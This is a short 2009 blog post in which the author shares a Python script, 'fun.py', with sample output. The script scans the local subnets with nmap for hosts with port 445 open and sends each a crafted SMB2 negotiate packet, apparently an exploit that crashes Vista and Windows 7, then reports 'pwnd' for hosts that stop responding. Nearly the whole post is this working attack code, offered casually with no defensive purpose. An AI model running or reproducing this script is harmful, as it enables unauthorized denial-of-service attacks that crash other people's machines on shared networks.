Monthly archive for September 2009

I should be studying!

This is what comes out of it:

oxygen-mobile:~ python fun.py
scanning subnet 192.168.1.3/24
 
sending exploit to 192.168.1.3 # Samba
 
sending exploit to 192.168.1.13 # Vista
 
pwnd 192.168.1.13
 
sending exploit to 192.168.1.14 # Windows 7

fun.py:

#!/usr/bin/python
 
from socket import socket,error
from time import sleep
from os import popen
 
for ownip in popen("LANG=C ip addr | grep 'inet ' | grep -v ' lo' | awk '{print $2}'").readlines():
        print("scanning subnet %s" %ownip )
        for neighborip in popen(" LANG=C nmap -n -sX --open -p445 %s |grep 'Interesting ports' | awk '{ print $4}' | tr -d ':' " %ownip.strip() ).readlines():
                print("sending exploit to %s" %neighborip)
                host = neighborip, 445
                buff = (
                "\x00\x00\x00\x90"
                "\xff\x53\x4d\x42" 
                "\x72\x00\x00\x00" 
                "\x00\x18\x53\xc8" 
                "\x00\x26"
                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
                "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
                "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
                "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
                "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
                "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
                "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
                "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
                "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
                "\x30\x30\x32\x00"
                )
                try:
                        s = socket()
                        s.settimeout(1.0)
                        s.connect(host)
                        s.send(buff)
                        s.close()
                except error, msg:
                        continue
                sleep(2)
                try:
                        s = socket()
                        s.settimeout(1.0)
                        s.connect(host)
                        s.close()
                except  error, msg:
                        print("pwnd %s" %neighborip)

Thu, 10 Sep 2009 at 18:30, Christian

